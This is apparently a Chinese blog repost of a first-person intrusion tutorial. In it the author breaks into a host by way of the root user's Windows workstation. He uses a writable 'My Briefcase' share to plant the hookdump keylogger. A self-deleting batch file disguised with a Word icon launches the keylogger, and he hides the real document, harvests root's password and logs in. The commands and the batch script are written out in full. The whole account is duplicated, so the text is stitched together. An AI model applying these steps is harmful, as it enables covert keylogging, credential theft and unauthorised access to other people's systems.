入侵Linux系统实例
程序员文章站
2022-10-02 14:56:19
我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(by the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果... 08-10-08...
我发现了一个网站,于是常规入侵。很好,它的finger开着,于是我编了一个shell,aaa帐号试到zzz(by the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果一个帐号也不存在,我没有再试它的帐号。因为我被它开的端口吸引住了,它开着www,我就不信它不出错。一连拿了五种cgi和www扫描器总计扫了三四百种常见错误它几乎都不存在。:( 有几个错误,但我不知道如何利用,算了。又绕着主机转了几圈,象狐狸遇见刺猬,无从下嘴。
还是看看root的信息吧:
finger root@xxx.xxx.xxx
login name: root in real life: system privileged account
directory: / shell: /bin/sh
last login fri jul 28 09:21 on ttyp0 from 202.xx.xx.xx
no plan.
root经常来,那个202.xx.xx.xx就是他用的工作站了,从那会不会看到点东西呢?
net view \202.xx.xx.xx
shared resources at \202.xx.xx.xx
sharename type comment
x
x
我的公文包
the command was completed successfully.
在上网的机器上开着windows的“文件和打印机共享”的服务,是很多人容易掉以轻心的,这个root没有例外。如果它的c盘共享了而且可写那就好了,但那是做梦,现在开了共享的目录没有一个是根目录,连d驱的都没有。别着急,慢慢来。x掉的那些文件夹都没用,不能写,里面尽是些英文原著,这个root还挺行的。“我的公文包”吸引了我的注意,这是一个用于将不同的机器上的资料进行同步的工具,很显然这个root要经常更新主机上的主页,有时候在自己的机器上编,有时候在主机上编……所以很重要的一点:“我的公文包”的共享一般都是可写的!
那我再进去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不错,确实可写。
>del temp.txt
不留痕迹——黑客的习惯。
>dir/od/p
看看都有些什么…… 倒数第二排那个是什么?“x月工作计划.doc”!就是它了,既然是计划就不可能写完了就丢一边,它肯定会再次打开它的——至少下个月写计划时要copy一下:->
该动手了,我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是一个键盘计录软件hookdump,我觉得它挺好的,价钱实惠,量也足…… 对不起,说习惯了,应该是它不仅记录下全部击键,还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单…… 总之,它的记录让你就和你站在他身后看他操作计算机一样详细了。您要问那么多木马你为啥装这个?要知道无论是中国的冰河、netspy还是外国的netbus、bo,都被各种杀毒软件列为头号侦查对象,而一个root的机器上可不可能没装杀毒软件?还是hookdump好,小小的,不起眼,不过如果大家都用只怕我再用它的机会就少了……
>copy hookdump.* i:
补充一点:上传前先编好它的hookdump.ini文件,置为隐藏方式运行,不然root一运行屏幕上蹦出一大窗口可就……。
然后再在自己的机器上编一个同名的bat文件:x月工作计划.bat
>edit c:x月工作计划.bat
@echo off
hookdump
attrib -h x月工作计划.doc
c:program filesmicrosoftofficewinword x月工作计划.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root运行了这个bat文件实际上就是先运行木马,再调用winword文件打开它想开的这个文件,然后自我删除,也许它机器上winword的位置不同,那调用就会失败,不过不要紧,反正bat会马上删除,他会以为是自己的误操作。
这时你的c驱根目录就有了这么一个bat文件,它是一个方形的图标,和那个word文件大相径庭,root怎么会运行它呢?没关系,在这个文件上点右键,点属性,在“程序”栏选“更改图标”不就行了吗?word的图标在你机器c:program filesmicrosoftoffice中。还要将“运行”改为“最小化”,“退出时关闭”打上勾,这样才能保证在运行时一点迹象也没有。事实上这个bat文件变成了两个,还有一个pif文件就是它的图标。
把这两个文件传上去:
>copy x月工作计划.bat i:
>copy x月工作计划.pif i:
然后把它的文件和自己的文件都藏起来:
>attrib h x月工作计划.doc
>attrib h x月工作计划.bat
这样,root的“公文包”里只剩下一个和原来一模一样的word图标,他做梦也没想到这已变成了一个bat文件。然后可以喘口气了,让我们静静的等……
几天后,我进入这个工作站,取下记录下来的击键记录,找出root的口令,进入主机。
还是看看root的信息吧:
finger root@xxx.xxx.xxx
login name: root in real life: system privileged account
directory: / shell: /bin/sh
last login fri jul 28 09:21 on ttyp0 from 202.xx.xx.xx
no plan.
root经常来,那个202.xx.xx.xx就是他用的工作站了,从那会不会看到点东西呢?
net view \202.xx.xx.xx
shared resources at \202.xx.xx.xx
sharename type comment
x
x
我的公文包
the command was completed successfully.
在上网的机器上开着windows的“文件和打印机共享”的服务,是很多人容易掉以轻心的,这个root没有例外。如果它的c盘共享了而且可写那就好了,但那是做梦,现在开了共享的目录没有一个是根目录,连d驱的都没有。别着急,慢慢来。x掉的那些文件夹都没用,不能写,里面尽是些英文原著,这个root还挺行的。“我的公文包”吸引了我的注意,这是一个用于将不同的机器上的资料进行同步的工具,很显然这个root要经常更新主机上的主页,有时候在自己的机器上编,有时候在主机上编……所以很重要的一点:“我的公文包”的共享一般都是可写的!
那我再进去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不错,确实可写。
>del temp.txt
不留痕迹——黑客的习惯。
>dir/od/p
看看都有些什么…… 倒数第二排那个是什么?“x月工作计划.doc”!就是它了,既然是计划就不可能写完了就丢一边,它肯定会再次打开它的——至少下个月写计划时要copy一下:->
该动手了,我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是一个键盘计录软件hookdump,我觉得它挺好的,价钱实惠,量也足…… 对不起,说习惯了,应该是它不仅记录下全部击键,还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单…… 总之,它的记录让你就和你站在他身后看他操作计算机一样详细了。您要问那么多木马你为啥装这个?要知道无论是中国的冰河、netspy还是外国的netbus、bo,都被各种杀毒软件列为头号侦查对象,而一个root的机器上可不可能没装杀毒软件?还是hookdump好,小小的,不起眼,不过如果大家都用只怕我再用它的机会就少了……
>copy hookdump.* i:
补充一点:上传前先编好它的hookdump.ini文件,置为隐藏方式运行,不然root一运行屏幕上蹦出一大窗口可就……。
然后再在自己的机器上编一个同名的bat文件:x月工作计划.bat
>edit c:x月工作计划.bat
@echo off
hookdump
attrib -h x月工作计划.doc
c:program filesmicrosoftofficewinword x月工作计划.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root运行了这个bat文件实际上就是先运行木马,再调用winword文件打开它想开的这个文件,然后自我删除,也许它机器上winword的位置不同,那调用就会失败,不过不要紧,反正bat会马上删除,他会以为是自己的误操作。
这时你的c驱根目录就有了这么一个bat文件,它是一个方形的图标,和那个word文件大相径庭,root怎么会运行它呢?没关系,在这个文件上点右键,点属性,在“程序”栏选“更改图标”不就行了吗?word的图标在你机器c:program filesmicrosoftoffice中。还要将“运行”改为“最小化”,“退出时关闭”打上勾,这样才能保证在运行时一点迹象也没有。事实上这个bat文件变成了两个,还有一个pif文件就是它的图标。
把这两个文件传上去:
>copy x月工作计划.bat i:
>copy x月工作计划.pif i:
然后把它的文件和自己的文件都藏起来:
>attrib h x月工作计划.doc
>attrib h x月工作计划.bat
这样,root的“公文包”里只剩下一个和原来一模一样的word图标,他做梦也没想到这已变成了一个bat文件。然后可以喘口气了,让我们静静的等……
几天后,我进入这个工作站,取下记录下来的击键记录,找出root的口令,进入主机。
上一篇: 传输层——UDP报文头介绍
下一篇: yoda's cryptor 壳流程分析